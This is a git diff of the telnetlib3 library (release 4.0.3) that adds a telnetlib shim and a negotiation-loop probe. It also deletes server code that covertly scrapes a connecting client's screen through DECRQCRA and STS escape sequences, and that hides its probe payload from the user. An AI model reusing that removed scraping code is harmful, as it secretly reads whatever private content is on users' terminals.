diff --git a/README.rst b/README.rst
index 5c12c1fb..760d7818 100644
--- a/README.rst
+++ b/README.rst
@@ -35,6 +35,8 @@ for Python 3.9 and newer.
This library supports both modern asyncio_ *and* legacy `Blocking API`_.
The python telnetlib.py_ module removed by Python 3.13 is also re-distributed as-is, as a backport.
+In Python 3.13+, ``pip install telnetlib3`` provides a drop-in ``import telnetlib`` shim, so
+existing code using the legacy standard telnet client API continues to work without modification.
See the `Guidebook`_ for examples and the `API documentation`_.
@@ -140,9 +142,6 @@ supported, widely used by MUD servers to reduce bandwidth::
# connect to a MUD that offers MCCP compression
telnetlib3-client dunemud.net 6789
- # or with TLS (compression auto-disabled over TLS, CRIME/BREACH mitigation)
- telnetlib3-client --ssl dunemud.net 6788
-
# actively request compression from a server
telnetlib3-client --compression dunemud.net 6789
@@ -152,11 +151,9 @@ supported, widely used by MUD servers to reduce bandwidth::
# host a MUD server that advertises MCCP2/MCCP3
telnetlib3-server --compression --shell=my_mud.shell
-By default (without ``--compression`` or ``--no-compression``), the client
-passively accepts compression when offered by the server, and the server does
-not advertise compression. Compression is automatically disabled over TLS
-connections to avoid CRIME/BREACH attacks.
-
+By default (without ``--compression`` or ``--no-compression``), the telnetlib3-client passively
+accepts compression when offered by the server, and the telnetlib3-server does not advertise
+compression. Compression is automatically disabled over TLS connections.
Asyncio Protocol
----------------
@@ -169,27 +166,6 @@ Blocking API
A Synchronous interface, modeled after telnetlib.py_ (client) and miniboa_ (server), with various
enhancements in protocol negotiation is also provided. See `sync API documentation`_ for more.
-Legacy telnetlib
-----------------
-
-This library contains an *unadulterated copy* of Python 3.12's telnetlib.py_,
-from the standard library before it was removed in Python 3.13.
-
-To migrate code, change import statements:
-
-.. code-block:: python
-
- # OLD imports:
- import telnetlib
-
- # NEW imports:
- import telnetlib3
-
-``telnetlib3`` did not provide server support, while this library also provides
-both client and server support through a similar Blocking API interface.
-
-See `sync API documentation`_ for details.
-
Quick Example
=============
diff --git a/bin/server_mud.py b/bin/server_mud.py
index 4819aea2..0400a34b 100755
--- a/bin/server_mud.py
+++ b/bin/server_mud.py
@@ -510,8 +510,6 @@ async def dispatch(self, text: str) -> bool:
return True
return await method(argument)
- # -- commands -------------------------------------------------------
-
async def do_help(self, argument: str) -> bool:
"""Show available commands."""
if argument:
@@ -679,8 +677,6 @@ async def do_quit(self, *_args: str) -> bool:
broadcast_room(self.writer, self.player.room, f"{self.player.name} has left.")
return False
- # -- helpers --------------------------------------------------------
-
async def _move(self, direction: str) -> bool:
"""Move player in *direction*."""
w, p = self.writer, self.player
diff --git a/docs/guidebook.rst b/docs/guidebook.rst
index df779451..5a6a1573 100644
--- a/docs/guidebook.rst
+++ b/docs/guidebook.rst
@@ -359,7 +359,7 @@ TLS / SSL
Telnet over TLS (TELNETS, IANA port 992) secures the connection using
standard TLS encryption. The TLS handshake is handled at the transport
-layer — the telnet protocol sees plaintext exactly as it would over plain
+layer, the telnet protocol sees plaintext exactly as it would over plain
TCP. This is *not* STARTTLS (upgrade-in-place); the connection is
encrypted from the start.
@@ -426,10 +426,10 @@ Or programmatically with full control::
import ssl
import telnetlib3
- # CA-signed server — just pass ssl=True
+ # CA-signed server, just pass ssl=True
reader, writer = await telnetlib3.open_connection("dunemud.net", 6788, ssl=True)
- # Self-signed — load the server's cert explicitly
+ # Self-signed, load the server's cert explicitly
ctx = ssl.create_default_context(cafile="cert.pem")
reader, writer = await telnetlib3.open_connection("localhost", 6023, ssl=ctx)
@@ -447,7 +447,7 @@ certificates)::
.. warning::
``--ssl-no-verify`` is **insecure**. The connection is encrypted, but the
- server's identity is not verified — a man-in-the-middle could intercept
+ server's identity is not verified, a man-in-the-middle could intercept
traffic. Only use this for testing or when you trust the network path.
server_tls.py
@@ -811,12 +811,10 @@ Legacy telnetlib Compatibility
Python's ``telnetlib`` was removed in Python 3.13 (`PEP 594
`_). telnetlib3 includes a verbatim copy from Python 3.12 with its original test
-suite::
+suite and a drop-in shim so that ``import telnetlib`` continues to work::
- # OLD:
+ # Both of these work:
from telnetlib import Telnet
-
- # NEW:
from telnetlib3.telnetlib import Telnet
The legacy module has limited negotiation support and is maintained for
diff --git a/docs/history.rst b/docs/history.rst
index 0ce23566..7668f5a8 100644
--- a/docs/history.rst
+++ b/docs/history.rst
@@ -1,5 +1,16 @@
History
=======
+4.0.3
+ * bugfix: long-running servers leaked memory through :class:`~telnetlib3.server.Server`
+ ``_protocols`` list and ``_new_client`` asyncio.Queue. Both are now bounded
+ and regularly pruned.
+ * enhancement: ``telnetlib3.telnet`` now overlays std library module space, ``import telnetlib``
+ :ghissue:`139`.
+ * enhancement: ``telnetlib3-fingerprint-server`` and ``telnetlib3-fingerprint`` client now also
+ detect "telnet loops" and "wrong direction" errors in opposing IAC parser.
+ * removed: ``telnetlib3-fingerprint-server`` no longer integrates with the (never released)
+ ``tv-detect`` package for terminal vulnerability probing.
+
4.0.2
* bugfix: MCCP2 decompression failed on MUD servers using raw deflate or gzip-wrapped compression,
producing garbled banners. The client now auto-detects zlib/gzip format and falls back to raw
@@ -84,7 +95,7 @@ History
server and client protocol code.
* new: ``_atomic_json_write()`` and ``_BytesSafeEncoder`` helpers in
``_paths`` module for fingerprinting subsystem.
- * enhancement: Microsoft Telnet (``telnet.exe``) compatibility refined — server
+ * enhancement: Microsoft Telnet (``telnet.exe``) compatibility refined, server
now sends ``DO NEW_ENVIRON`` but excludes ``USER`` variable instead of
skipping the option entirely, :ghissue:`24`.
* enhancement: comprehensive pylint and mypy cleanup across the codebase.
@@ -108,7 +119,7 @@ History
MSSP, MSP, MXP, ZMP, AARDWOLF, ATCP) by default. Use ``--always-do`` or
``--always-will`` to opt in.
* bugfix: log output "staircase text" in raw terminal mode.
- * bugfix: graceful EOF handling — connection close no longer prints a traceback.
+ * bugfix: graceful EOF handling, connection close no longer prints a traceback.
2.5.0
* change: ``telnetlib3-client`` now defaults to raw terminal mode (no line
@@ -159,7 +170,7 @@ History
art) as surrogates instead of replacing them with U+FFFD.
2.4.0
- * new: ``telnetlib3.color_filter`` module — translates 16-color ANSI SGR
+ * new: ``telnetlib3.color_filter`` module, translates 16-color ANSI SGR
codes to 24-bit RGB from hardware palettes (EGA, CGA, VGA, xterm).
Enabled by default. New client CLI options: ``--colormatch``,
``--color-brightness``, ``--color-contrast``, ``--background-color``,
@@ -181,11 +192,11 @@ History
* enhancement: ``telnetlib3-fingerprint`` now always probes extended MUD
options (MSP, MXP, ZMP, AARDWOLF, ATCP) during server scans and captures
ZMP, ATCP, Aardwolf, MXP, and COM-PORT data in session output.
- * enhancement: ``telnetlib3-fingerprint`` smart prompt detection —
+ * enhancement: ``telnetlib3-fingerprint`` smart prompt detectionm
auto-answers yes/no, color, UTF-8 menu, ``who``, and ``help`` prompts.
* enhancement: ``--banner-max-bytes`` option for ``telnetlib3-fingerprint``;
default raised from 1024 to 65536.
- * new: ATASCII (Atari 8-bit) codec — ``--encoding=atascii`` for connecting
+ * new: ATASCII (Atari 8-bit) codec, ``--encoding=atascii`` for connecting
to Atari BBS systems. Maps all 256 byte values to Unicode including
graphics characters, card suits, and the inverse-video range (0x80--0xFF).
ATASCII EOL (0x9B) maps to newline. Aliases: ``atari8bit``, ``atari_8bit``.
@@ -233,7 +244,7 @@ History
* enhancement: reversed ``WILL``/``DO`` for directional options (e.g. ``WILL
NAWS`` from server, ``DO TTYPE`` from client) now gracefully refused with
``DONT``/``WONT`` instead of raising :exc:`ValueError`.
- * enhancement: ``NEW_ENVIRON SEND`` and response logging improved —
+ * enhancement: ``NEW_ENVIRON SEND`` and response logging improved,
``SEND (all)`` / ``env send: (empty)`` instead of raw byte dumps.
* enhancement: ``telnetlib3-fingerprint`` now probes MSDP and MSSP options
and captures MSSP server status data in session output.
diff --git a/docs/rfcs.rst b/docs/rfcs.rst
index 71eccc78..016bf327 100644
--- a/docs/rfcs.rst
+++ b/docs/rfcs.rst
@@ -14,6 +14,7 @@ RFCs Implemented
* :rfc:`859`, "Telnet Status Option", May 1983.
* :rfc:`860`, "Telnet Timing mark Option", May 1983.
* :rfc:`885`, "Telnet End of Record Option", Dec 1983.
+* :rfc:`930`, "Telnet Terminal Type Option", Jan 1984.
* :rfc:`1073`, "Telnet Window Size Option", Oct 1988.
* :rfc:`1079`, "Telnet Terminal Speed Option", Dec 1988.
* :rfc:`1091`, "Telnet Terminal-Type Option", Feb 1989.
@@ -59,8 +60,8 @@ RFCs Not Implemented
* :rfc:`1041`, "Telnet 3270 Regime Option", Jan 1988
* :rfc:`1043`, "Telnet Data Entry Terminal Option", Feb 1988
* :rfc:`1097`, "Telnet Subliminal-Message Option", Apr 1989
-* :rfc:`1143`, "The Q Method of Implementing .. Option Negotiation", Feb 1990
- Approximately only Rules 1, 2, and 3, but not 4, 5, and 6.
+* :rfc:`1143`, "The Q Method of Implementing .. Option Negotiation", Feb 1990, Approximately only
+ Rules 1, 2, and 3 are implemented, but not 4, 5, and 6.
* :rfc:`1205`, "5250 Telnet Interface", Feb 1991
* :rfc:`1411`, "Telnet Authentication: Kerberos_ Version 4", Jan 1993
* :rfc:`1412`, "Telnet Authentication: SPX"
diff --git a/pyproject.toml b/pyproject.toml
index a9322b9c..a766a723 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "hatchling.build"
[project]
name = "telnetlib3"
-version = "4.0.2" # Keep in sync with telnetlib3/accessories.py::get_version !
+version = "4.0.3" # Keep in sync with telnetlib3/accessories.py::get_version !
description = " Python Telnet server and client CLI and Protocol library"
readme = "README.rst"
license = "ISC"
@@ -45,7 +45,7 @@ classifiers = [
requires-python = ">=3.9"
dependencies = [
"wcwidth>=0.6.0",
- "blessed>=1.33; platform_system == 'Windows'",
+ "blessed>=1.41; platform_system == 'Windows'",
]
[project.optional-dependencies]
@@ -55,6 +55,7 @@ docs = [
"sphinx-autodoc-typehints",
]
extras = [
+ "blessed>=1.41",
"prettytable>=3.17,<4",
"ucs-detect>=2,<3",
]
@@ -82,11 +83,15 @@ include = [
"/requirements*.txt",
"/.gitignore",
"/pyproject.toml",
+ "/telnetlib.py",
]
[tool.hatch.build.targets.wheel]
packages = ["telnetlib3"]
+[tool.hatch.build.targets.wheel.force-include]
+"telnetlib.py" = "telnetlib.py"
+
[tool.pylint.main]
load-plugins = [
"pylint.extensions.check_elif",
@@ -182,7 +187,7 @@ reports = false
msg-template = "{path}:{line}: [{msg_id}({symbol}), {obj}] {msg}"
[tool.mypy]
-python_version = "3.9"
+python_version = "3.14"
strict = true
disallow_subclassing_any = false
ignore_missing_imports = true
@@ -193,7 +198,7 @@ module = ["telnetlib3.tests.*"]
ignore_errors = true
[[tool.mypy.overrides]]
-module = ["telnetlib3.telnetlib"]
+module = ["telnetlib3.telnetlib", "telnetlib"]
ignore_errors = true
[tool.black]
diff --git a/telnetlib.py b/telnetlib.py
new file mode 100644
index 00000000..39b0f8eb
--- /dev/null
+++ b/telnetlib.py
@@ -0,0 +1,2 @@
+"""Drop-in shim for telnetlib (removed from stdlib in Python 3.13)."""
+from telnetlib3.telnetlib import * # noqa: F401, F403
diff --git a/telnetlib3/accessories.py b/telnetlib3/accessories.py
index 40fedbbf..9ba91975 100644
--- a/telnetlib3/accessories.py
+++ b/telnetlib3/accessories.py
@@ -42,7 +42,7 @@
def get_version() -> str:
"""Return the current version of telnetlib3."""
- return "4.0.2" # keep in sync with pyproject.toml !
+ return "4.0.3" # keep in sync with pyproject.toml !
def encoding_from_lang(lang: str) -> Optional[str]:
diff --git a/telnetlib3/client_shell_win32.py b/telnetlib3/client_shell_win32.py
index 970269bf..2b03d0c7 100644
--- a/telnetlib3/client_shell_win32.py
+++ b/telnetlib3/client_shell_win32.py
@@ -241,8 +241,8 @@ async def telnet_client_shell(
"""
Windows telnet client shell using blessed/jinxed Terminal.
- Requires ``blessed>=1.20`` (installed automatically on Windows via the
- ``blessed; platform_system == 'Windows'`` dependency in pyproject.toml).
+ Requires blessed, installed automatically on Windows via the
+ ``blessed; platform_system == 'Windows'`` directive in pyproject.toml.
"""
with Terminal(telnet_writer=telnet_writer) as tty_shell:
await _telnet_client_shell_impl(telnet_reader, telnet_writer, tty_shell)
diff --git a/telnetlib3/encodings/big5bbs.py b/telnetlib3/encodings/big5bbs.py
index a97591b7..7e3e3331 100644
--- a/telnetlib3/encodings/big5bbs.py
+++ b/telnetlib3/encodings/big5bbs.py
@@ -104,7 +104,7 @@ def decode(self, input: bytes, final: bool = False) -> str: # type: ignore[over
result.append(bytes([b, b2]).decode("big5", errors="strict"))
i += 2
except UnicodeDecodeError:
- # Structurally valid but undefined in Big5 — treat
+ # Structurally valid but undefined in Big5, treat
# the lone lead byte as a CP437 half-width character.
result.append(bytes([b]).decode("cp437"))
i += 1
diff --git a/telnetlib3/fingerprinting.py b/telnetlib3/fingerprinting.py
index 473173ca..a5e1e1dc 100644
--- a/telnetlib3/fingerprinting.py
+++ b/telnetlib3/fingerprinting.py
@@ -14,7 +14,6 @@
# std imports
import os
-import re
import sys
import json
import time
@@ -95,22 +94,6 @@
from .stream_reader import TelnetReader, TelnetReaderUnicode
from .stream_writer import TelnetWriter, TelnetWriterUnicode
-# third-party (optional) — vulnerability probes from tv-detect
-try:
- from tv_detect.probes import CPR_RE as _CPR_RE
- from tv_detect.probes import CPR_FENCE as _CPR_FENCE
- from tv_detect.probes import DECCKSR_RE as _DECCKSR_RE
- from tv_detect.probes import STS_SOS_RE as _STS_SOS_RE
- from tv_detect.probes import DECRQCRA_TEMPLATE as _DECRQCRA
- from tv_detect.probes import probe_sts as _tv_probe_sts
- from tv_detect.probes import probe_decrqcra as _tv_probe_decrqcra
- from tv_detect.probes import probe_injection as _tv_probe_injection
- from tv_detect.probes import probe_cve_vulnerabilities as _tv_probe_cves
-
- _HAS_TV_DETECT = True
-except ImportError:
- _HAS_TV_DETECT = False
-
class ProbeResult(TypedDict, total=False):
"""Result of probing a single telnet option."""
@@ -168,7 +151,7 @@ class ProbeResult(TypedDict, total=False):
"fingerprinting_post_script",
"get_client_fingerprint",
"probe_client_capabilities",
- "scrape_screen_sts",
+ "probe_client_loop_detection",
)
#: Extended NEW_ENVIRON variable list used during client fingerprinting.
@@ -301,14 +284,12 @@ class FingerprintingServer(FingerprintingTelnetServer, TelnetServer):
"""
def connection_lost(self, exc: Optional[Exception]) -> None:
- """Log connection close/loss with detected terminal label."""
- term_label = getattr(self.writer, "_tv_term_label", None) if self.writer else None
- suffix = f" {term_label}" if term_label else ""
+ """Log connection close/loss."""
if not self._closing:
if exc is None:
- logger.info("Connection closed for %s%s", self, suffix)
+ logger.info("Connection closed for %s", self)
else:
- logger.info("Connection lost for %s: %s%s", self, exc, suffix)
+ logger.info("Connection lost for %s: %s", self, exc)
self._closing = True # pylint: disable=attribute-defined-outside-init
if exc is None:
self.reader.feed_eof()
@@ -408,6 +389,70 @@ def connection_lost(self, exc: Optional[Exception]) -> None:
_OPT_BYTE_TO_NAME = {f"0x{opt[0]:02x}": name for opt, name, _ in _ALL_KNOWN_OPTIONS}
+async def probe_client_loop_detection(
+ writer: TelnetWriter, probe_results: dict[str, ProbeResult], timeout: float = 0.3
+) -> list[str]:
+ """
+ Detect clients that would re-negotiate already-agreed options (telnet loop).
+
+ Saves the negotiation state for options the client already agreed to,
+ clears the cache, re-sends IAC DO / IAC WILL for those options, and
+ checks whether the client replies again. A well-behaved client ignores
+ redundant requests in the YES state; a loop-prone client replies again.
+
+ Checks both directions: re-DO'ing options the client already WILL'd,
+ and re-WILL'ing options the client already DO'd.
+
+ :returns: Sorted list of option names that would loop.
+ """
+ from .telopt import DO, WILL
+
+ looped: set[str] = set()
+
+ for _label, opt_dict, probe_cmd in (
+ ("remote", writer.remote_option, DO),
+ ("local", writer.local_option, WILL),
+ ):
+ agreed: dict[bytes, bool] = {}
+ for opt, enabled in opt_dict.items():
+ if enabled:
+ agreed[opt] = True
+ if not agreed:
+ continue
+
+ saved: dict[bytes, bool | None] = {}
+ for opt in agreed:
+ saved[opt] = opt_dict.get(opt)
+ opt_dict[opt] = None # type: ignore[assignment]
+ writer.pending_option.pop(probe_cmd + opt, None)
+
+ try:
+ writer._in_loop_detection = True
+ for opt in agreed:
+ writer.iac(probe_cmd, opt)
+
+ loop = asyncio.get_running_loop()
+ deadline = loop.time() + timeout
+ while loop.time() < deadline:
+ all_settled = all(opt_dict.get(opt) is not None for opt in agreed)
+ if all_settled:
+ break
+ await asyncio.sleep(0.05)
+
+ for opt in agreed:
+ if opt_dict.get(opt) is not None:
+ looped.add(_opt_byte_to_name(opt))
+
+ finally:
+ writer._in_loop_detection = False
+ for opt, value in saved.items():
+ opt_dict[opt] = value # type: ignore[assignment]
+ for opt in agreed:
+ writer.pending_option.pop(probe_cmd + opt, None)
+
+ return sorted(looped)
+
+
async def probe_client_capabilities(
writer: Union[TelnetWriter, TelnetWriterUnicode],
options: Optional[list[tuple[bytes, str, str]]] = None,
@@ -586,6 +631,10 @@ def _collect_rejected_options(
result["will"] = sorted(_opt_byte_to_name(opt) for opt in writer.rejected_will)
if getattr(writer, "rejected_do", None):
result["do"] = sorted(_opt_byte_to_name(opt) for opt in writer.rejected_do)
+ if getattr(writer, "directional_refusals", None):
+ result["directional"] = sorted(
+ _opt_byte_to_name(opt) for opt in writer.directional_refusals
+ )
return result
@@ -697,7 +746,9 @@ def _collect_slc_tab(writer: Union[TelnetWriter, TelnetWriterUnicode]) -> dict[s
def _create_protocol_fingerprint(
- writer: Union[TelnetWriter, TelnetWriterUnicode], probe_results: dict[str, ProbeResult]
+ writer: Union[TelnetWriter, TelnetWriterUnicode],
+ probe_results: dict[str, ProbeResult],
+ looped_options: Optional[list[str]] = None,
) -> dict[str, Any]:
"""
Create anonymized/summarized protocol fingerprint from session data.
@@ -756,6 +807,10 @@ def _create_protocol_fingerprint(
fingerprint["rejected-will"] = rejected["will"]
if rejected.get("do"):
fingerprint["rejected-do"] = rejected["do"]
+ if rejected.get("directional"):
+ fingerprint["directional-refusals"] = rejected["directional"]
+ if looped_options:
+ fingerprint["looped-negotiation"] = looped_options
linemode_probed = any(
name == "LINEMODE" and info["status"] == "WILL" for name, info in probe_results.items()
@@ -1011,6 +1066,7 @@ def _save_fingerprint_data(
probe_results: dict[str, ProbeResult],
probe_time: float,
session_fp: Optional[dict[str, Any]] = None,
+ looped: Optional[list[str]] = None,
) -> Optional[str]:
"""
Save comprehensive fingerprint data to a JSON file.
@@ -1032,7 +1088,7 @@ def _save_fingerprint_data(
if session_fp is None:
session_fp = _build_session_fingerprint(writer, probe_results, probe_time)
- protocol_fp = _create_protocol_fingerprint(writer, probe_results)
+ protocol_fp = _create_protocol_fingerprint(writer, probe_results, looped_options=looped)
telnet_hash = _hash_fingerprint(protocol_fp)
session_identity = _create_session_fingerprint(writer)
@@ -1106,390 +1162,6 @@ def _is_maybe_ms_telnet(writer: Union[TelnetWriter, TelnetWriterUnicode]) -> boo
return True
-if not _HAS_TV_DETECT:
- _CPR_RE = re.compile(rb"\x1b\[(\d+);(\d+)R") # noqa: F811
- _DECRQCRA = "\x1b[{pid};1;{r};{c};{r};{c}*y" # noqa: F811
- _DECCKSR_RE = re.compile(rb"\x1bP(\d+)!~([0-9A-Fa-f]{4})\x1b\\") # noqa: F811
- _STS_SOS_RE = re.compile(rb"\x1bXCTerm:STS:(\d+):(.*?)\x1b\\", re.DOTALL) # noqa: F811
- _CPR_FENCE = "\x1b[6n" # noqa: F811
-
-
-async def _read_until_cpr(
- reader: Union[TelnetReader, TelnetReaderUnicode], timeout: float = 1.0
-) -> tuple[Optional[re.Match[bytes]], bytes]:
- """Read from reader until a CPR response arrives or timeout."""
- buf = b""
- deadline = asyncio.get_running_loop().time() + timeout
- while True:
- remaining = deadline - asyncio.get_running_loop().time()
- if remaining <= 0:
- break
- try:
- raw = await asyncio.wait_for(reader.read(256), timeout=remaining)
- except (asyncio.TimeoutError, ConnectionError):
- break
- if not raw:
- break
- if isinstance(raw, str):
- buf += raw.encode("latin-1")
- else:
- buf += cast(bytes, raw)
- match = _CPR_RE.search(buf)
- if match:
- return match, buf
- return None, buf
-
-
-def _make_send_recv(
- reader: Union[TelnetReader, TelnetReaderUnicode],
- writer: Union[TelnetWriter, TelnetWriterUnicode],
-) -> Any:
- """Create a send_recv callback for tv-detect probes."""
- _writer = cast(TelnetWriterUnicode, writer)
-
- async def send_recv(sequence: str, timeout: float) -> tuple[Optional[re.Match[bytes]], bytes]:
- _writer.write(sequence)
- await _writer.drain()
- return await _read_until_cpr(reader, timeout)
-
- return send_recv
-
-
-async def _shielded_probe(
- reader: Union[TelnetReader, TelnetReaderUnicode],
- writer: Union[TelnetWriter, TelnetWriterUnicode],
- number: int,
- name: str,
- description: str,
- sequence: str,
- timeout: float = 1.0,
-) -> tuple[Optional[re.Match[bytes]], bytes]:
- """
- Run a probe with shielded display: heading, description, and CPR cloaking.
-
- Writes a heading with ``=`` underline, description, and ``payload:`` label,
- then records the cursor position via CPR, sends the probe sequence, and
- restores the cursor to overwrite any visible payload output with ``ok``.
-
- :param reader: Telnet reader for CPR responses.
- :param writer: Telnet writer for display and probe output.
- :param number: Display number for this probe.
- :param name: Short probe name (used as heading).
- :param description: One-line description shown below the heading.
- :param sequence: Raw escape sequence payload (CPR fence appended automatically).
- :param timeout: Seconds to wait for probe CPR response.
- :returns: ``(cpr_match, buf)`` — same as :func:`_read_until_cpr`.
- """
- _writer = cast(TelnetWriterUnicode, writer)
-
- heading = f"{number}. {name}"
- underline = "=" * len(heading)
- _writer.write(f"{heading}\r\n{underline}\r\n\r\n{description}\r\npayload: ")
- await _writer.drain()
-
- # Record cursor position via CPR.
- _writer.write("\x1b[6n")
- await _writer.drain()
- pos_match, _ = await _read_until_cpr(reader, 1.0)
- saved_row = saved_col = None
- if pos_match:
- saved_row = int(pos_match.group(1))
- saved_col = int(pos_match.group(2))
-
- # Send probe payload + CPR fence.
- _writer.write(sequence + _CPR_FENCE)
- await _writer.drain()
- cpr_match, buf = await _read_until_cpr(reader, timeout)
-
- # Restore cursor position, overwrite with "ok", clear to end of line.
- if saved_row is not None:
- _writer.write(f"\x1b[{saved_row};{saved_col}H")
- _writer.write("ok\x1b[K\r\n")
- await _writer.drain()
-
- return cpr_match, buf
-
-
-async def scrape_screen_sts(
- reader: Union[TelnetReader, TelnetReaderUnicode],
- writer: Union[TelnetWriter, TelnetWriterUnicode],
- rows: int = 25,
- cols: int = 80,
- timeout: float = 5.0,
-) -> Optional[dict[str, Any]]:
- """
- Scrape full screen contents via STS.
-
- :returns: dict with screen content as list of row strings, or None.
- """
- _writer = cast(TelnetWriterUnicode, writer)
-
- # SSA at (1,1), cursor to (rows,cols), STS
- _writer.write("\x1b[1;1H" "\x1bF" f"\x1b[{rows};{cols}H" "\x1bS")
- await _writer.drain()
-
- buf = b""
- deadline = asyncio.get_running_loop().time() + timeout
- while True:
- remaining = deadline - asyncio.get_running_loop().time()
- if remaining <= 0:
- break
- try:
- raw = await asyncio.wait_for(reader.read(4096), timeout=remaining)
- except (asyncio.TimeoutError, ConnectionError):
- break
- if not raw:
- break
- if isinstance(raw, str):
- buf += raw.encode("latin-1")
- else:
- buf += cast(bytes, raw)
- if b"\x1b\\" in buf:
- break
-
- match = _STS_SOS_RE.search(buf)
- if not match:
- return None
-
- content = match.group(2)
- # Split into rows of `cols` characters each
- text = content.decode("latin-1", errors="replace")
- screen_rows = []
- for r in range(rows):
- start = r * cols
- end = start + cols
- if start < len(text):
- screen_rows.append(text[start:end].rstrip())
- else:
- screen_rows.append("")
-
- return {"method": "sts", "rows": rows, "cols": cols, "normal": screen_rows}
-
-
-_UNKNOWN_CKSUM_RE = re.compile(r"\?0x[0-9A-Fa-f]{4}")
-_ALT_SCREEN_ON = "\x1b[?47h"
-_ALT_SCREEN_OFF = "\x1b[?47l"
-_XTCHECKSUM = "\x1b[3#y"
-_PRINTABLE = range(32, 127)
-
-
-async def _blast_collect(
- reader: Union[TelnetReader, TelnetReaderUnicode], expected: int, timeout: float = 2.0
-) -> dict[int, int]:
- """Collect DECRQCRA checksum responses, returning {pid: checksum}."""
- results: dict[int, int] = {}
- buf = b""
- deadline = asyncio.get_running_loop().time() + timeout
- while len(results) < expected:
- remaining = deadline - asyncio.get_running_loop().time()
- if remaining <= 0:
- break
- try:
- raw = await asyncio.wait_for(reader.read(65536), timeout=remaining)
- except (asyncio.TimeoutError, ConnectionError):
- break
- if not raw:
- break
- if isinstance(raw, str):
- buf += raw.encode("latin-1")
- else:
- buf += cast(bytes, raw)
- for m in _DECCKSR_RE.finditer(buf):
- results[int(m.group(1))] = int(m.group(2), 16)
- last_st = buf.rfind(b"\x1b\\")
- if last_st >= 0:
- buf = buf[last_st + 2 :]
- return results
-
-
-async def _build_checksum_lookup(
- reader: Union[TelnetReader, TelnetReaderUnicode],
- writer: Union[TelnetWriter, TelnetWriterUnicode],
- cal_row: int,
- usable_cols: int,
-) -> dict[int, str]:
- """Build checksum-to-character lookup by calibrating printable ASCII."""
- _writer = cast(TelnetWriterUnicode, writer)
- table: dict[int, str] = {}
- offset = 0
- printable = list(_PRINTABLE)
-
- while offset < len(printable):
- batch = printable[offset : offset + usable_cols]
- s = f"\x1b[{cal_row};1H" + "".join(chr(c) for c in batch)
- for i, code in enumerate(batch):
- s += _DECRQCRA.format(pid=code, r=cal_row, c=i + 1)
- _writer.write(s)
- await _writer.drain()
-
- results = await _blast_collect(reader, len(batch), timeout=5.0)
- _writer.write(f"\x1b[{cal_row};1H\x1b[2K")
- await _writer.drain()
-
- if len(results) < len(batch):
- return {}
-
- for code in batch:
- cksum = results.get(code)
- if cksum is None:
- return {}
- table[cksum] = chr(code)
-
- offset += usable_cols
-
- return table
-
-
-async def _blast_scrape(
- reader: Union[TelnetReader, TelnetReaderUnicode],
- writer: Union[TelnetWriter, TelnetWriterUnicode],
- rows: int,
- cols: int,
- lookup: dict[int, str],
- timeout: float = 10.0,
-) -> str:
- """Scrape entire screen contents using DECRQCRA."""
- _writer = cast(TelnetWriterUnicode, writer)
- space_cksum = next((k for k, v in lookup.items() if v == " "), None)
-
- queries = []
- for row in range(1, rows + 1):
- for col in range(1, cols + 1):
- pid = (row - 1) * cols + (col - 1)
- queries.append(_DECRQCRA.format(pid=pid, r=row, c=col))
- _writer.write("".join(queries))
- await _writer.drain()
-
- results = await _blast_collect(reader, rows * cols, timeout=timeout)
-
- lines = []
- for row in range(1, rows + 1):
- chars = []
- for col in range(1, cols + 1):
- pid = (row - 1) * cols + (col - 1)
- cksum = results.get(pid)
- if cksum is None or cksum == 0 or cksum == space_cksum:
- chars.append(" ")
- elif cksum in lookup:
- chars.append(lookup[cksum])
- else:
- chars.append(f"?0x{cksum:04X}")
- lines.append("".join(chars).rstrip())
- return "\n".join(lines).strip()
-
-
-async def scrape_screen(
- reader: Union[TelnetReader, TelnetReaderUnicode],
- writer: Union[TelnetWriter, TelnetWriterUnicode],
- rows: int,
- cols: int,
-) -> Optional[dict[str, Any]]:
- """
- Scrape screen contents via DECRQCRA before any output is sent.
-
- :returns: dict with screen_0 (and optionally screen_1) or None.
- """
- _writer = cast(TelnetWriterUnicode, writer)
- usable_cols = cols - 1
-
- # discover current cursor row via CPR
- _writer.write("\x1b[6n")
- await _writer.drain()
- cpr_match, _ = await _read_until_cpr(reader, timeout=2.0)
- cal_row = int(cpr_match.group(1)) if cpr_match else rows
-
- # set XTerm-compatible checksum mode
- _writer.write(_XTCHECKSUM)
- await _writer.drain()
- # drain any response
- await asyncio.sleep(0.1)
- while True:
- try:
- data = await asyncio.wait_for(reader.read(256), timeout=0.1)
- if not data:
- break
- except (asyncio.TimeoutError, ConnectionError):
- break
-
- # probe DECRQCRA support
- _writer.write(f"\x1b[{cal_row};1HA")
- _writer.write(_DECRQCRA.format(pid=9999, r=cal_row, c=1))
- _writer.write("\x1b[6n")
- await _writer.drain()
-
- cpr_match, buf = await _read_until_cpr(reader, timeout=2.0)
- if cpr_match:
- buf = buf[: cpr_match.start()] + buf[cpr_match.end() :]
-
- probe_ok = False
- for m in _DECCKSR_RE.finditer(buf):
- if int(m.group(1)) == 9999:
- probe_ok = True
- break
-
- _writer.write(f"\x1b[{cal_row};1H\x1b[2K")
- await _writer.drain()
-
- if not probe_ok:
- logger.info("scrape_screen: DECRQCRA probe failed")
- return None
-
- lookup = await _build_checksum_lookup(reader, writer, cal_row, usable_cols)
- if not lookup:
- logger.info("scrape_screen: lookup table build failed")
- return None
-
- logger.info("scrape_screen: lookup table built, %d entries", len(lookup))
-
- # verify round-trip
- _writer.write(f"\x1b[{cal_row};1HZ")
- _writer.write(_DECRQCRA.format(pid=1, r=cal_row, c=1))
- _writer.write("\x1b[6n")
- await _writer.drain()
-
- cpr_match, buf = await _read_until_cpr(reader, timeout=1.0)
- if cpr_match:
- buf = buf[: cpr_match.start()] + buf[cpr_match.end() :]
- verify_results: dict[int, int] = {}
- for m in _DECCKSR_RE.finditer(buf):
- verify_results[int(m.group(1))] = int(m.group(2), 16)
- _writer.write(f"\x1b[{cal_row};1H\x1b[2K")
- await _writer.drain()
-
- verify_cksum = verify_results.get(1)
- if verify_cksum is None or lookup.get(verify_cksum) != "Z":
- logger.info("scrape_screen: verify failed, got %r for Z", verify_results.get(1))
- return None
-
- # Scale timeout by screen size — ~5ms per cell is generous for
- # high-latency links, with a 10s floor.
- scrape_timeout = max(10.0, rows * cols * 0.005)
-
- normal = await _blast_scrape(reader, writer, rows, cols, lookup, timeout=scrape_timeout)
- normal_clean = _UNKNOWN_CKSUM_RE.sub(" ", normal)
-
- _writer.write(_ALT_SCREEN_ON)
- await _writer.drain()
- alt = await _blast_scrape(reader, writer, rows, cols, lookup, timeout=scrape_timeout)
